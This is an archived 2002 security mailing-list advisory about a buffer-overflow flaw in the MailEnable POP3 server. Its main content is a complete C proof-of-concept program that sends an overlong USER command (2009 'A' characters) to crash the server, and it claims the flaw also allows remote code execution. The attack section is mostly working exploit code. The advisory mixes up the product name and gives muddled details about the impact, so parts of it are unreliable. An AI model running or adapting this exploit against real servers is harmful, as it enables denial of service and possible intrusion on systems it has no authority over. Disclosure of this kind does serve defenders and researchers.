[NT] MailEase POP3 Denial of Service

From: support@securiteam.com
Date: 11/21/02

Next message: support@securiteam.com: "[NEWS] iPlanet WebServer Vulnerable to Remote Root Compromise"

Previous message: support@securiteam.com: "[NT] Eudora Script Execution Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 21 Nov 2002 12:21:24 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

MailEase POP3 Denial of Service
------------------------------------------------------------------------

SUMMARY

<http://www.mailenable.com/> MailEnable's Messaging Services Platform is
a powerful and scalable hosted messaging platform for the Microsoft
Windows platform. All the elements of a professional and high performance
mail server have been integrated into MailEnable with all the difficult
and tedious aspects removed.

DETAILS

A vulnerability in the USER allows remote attackers to execute arbitrary
code.

Exploit:
USER Ax2009 will over write strcmp();

Here's the code to hang the pop3 server:
/*
*
* Written by redsand
* <redsand@redsand.net>
* Vuln. date found: November 18. 2002
* Vulnerable: Windows 9x/NT/XP MailEnable POP Server Version 1.02
*
* Usage: ./mailenable-dos.1.3 <host> [port] [port] is optional. default is
in the #define (port 110)
* Need to Enable [offset] in final release.
*
* Proof of Concept code (PoC)
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 110

char string[2010];
char death[2500];
char top[5], end[50];
char tag[] = "::redsand.net::";

int main(int argc, char *argv[]) {

  int sockfd, port, i;
  char buf[2500];
  struct hostent *ha;
  struct sockaddr_in sa;
  if (argc < 2 ) {
printf("MailEnable POP Server Version 1.02 DoS\n:: redsand <at>
redsand.net\r\nUsage: %s <host> <port>\n", argv[0]);
    exit(0);
  }
if (argv[2]) {
port = atoi(argv[2]);
} else { port = PORT; }
for( i = 0; i <2009; i++) {
string[i] = 'A';
}

strcpy(top,"USER ");
strcpy(end,tag);
strcpy(death,top);
strcat(death,string);
strcat(death,end);

if (!(ha = gethostbyname (argv[1])))
perror ("gethostbyname");

  bzero (&sa, sizeof (sa));
  bcopy (ha->h_addr, (char *) &sa.sin_addr, ha->h_length);
  sa.sin_family = ha->h_addrtype;
  sa.sin_port = htons (port);

  if ((sockfd = socket (ha->h_addrtype, SOCK_STREAM, 0)) < 0) {
    perror ("socket");
    exit (1);
  }
printf("MailEnable :: redsand <at> redsand.net\r\n+ connecting...\n");
  if (connect (sockfd, (struct sockaddr *) &sa, sizeof(sa)) < 0) {
    perror ("connect");
    exit (1);
  }
  printf("+ connected\n+ sending request to pop3 server\n");
  send(sockfd, death, sizeof(death), 0);
  // read(sockfd, buf, 2050, 0);
    close(sockfd);
  printf("+ finished\n");
  printf("\r\rIf exploit worked, then it should bind port on 3879\n");
}

/* redsand.net */

ADDITIONAL INFORMATION

The information has been provided by <mailto:redsand@redsand.net> TJ
Shelton.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: support@securiteam.com: "[NEWS] iPlanet WebServer Vulnerable to Remote Root Compromise"
Previous message: support@securiteam.com: "[NT] Eudora Script Execution Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[EXPL] TIBCO RendezVous Buffer Overflow (Exploit)
... TIB/Rendezvous Routing Communications Daemon (add router buffer ... TIB/Rendezvous
Secure Daemon (port 7580) ... char *daemon; ... unsigned int DataOffset;
... (Securiteam)
Re: Angband with an accent: displaying extended characters
... I'd certainly expect a port to be possible, ... >> About platform
stuff, the ideal situation would be if all platform dependent ... >> We are at least not
in a hurry to remove support for RISCOS, ... future and which ones are lost cases that
none care or compile for anymore. ... (rec.games.roguelike.angband)
Re: Serial Communication in Visual C++
... int CCommTalk::Write(const char *pBuf, int nBytes) { ... I don't see any problem
that could cause a significant delay. ... Visual C++ can certainly keep the port busy
at 9600 baud, ... It should take about 50 milliseconds to send your 50 char buffer at 9600 baud.
... (microsoft.public.vc.language)
Re: OpenVMS Itanium port progressing well says Gorham!
... do with the actual port itself. ... This was the BS spouted about OpenVMS
when it apparently ... >>have been asking for a port to a low cost commodity platform
... >>100,000 for a 4 way server is commodity pricing. ... (comp.os.vms)
Re: Apple ahead of schedule
... They would find that preferable to making a port? ... platform or porting
their product. ... efforts in the future to Windows, ... (comp.sys.mac.advocacy)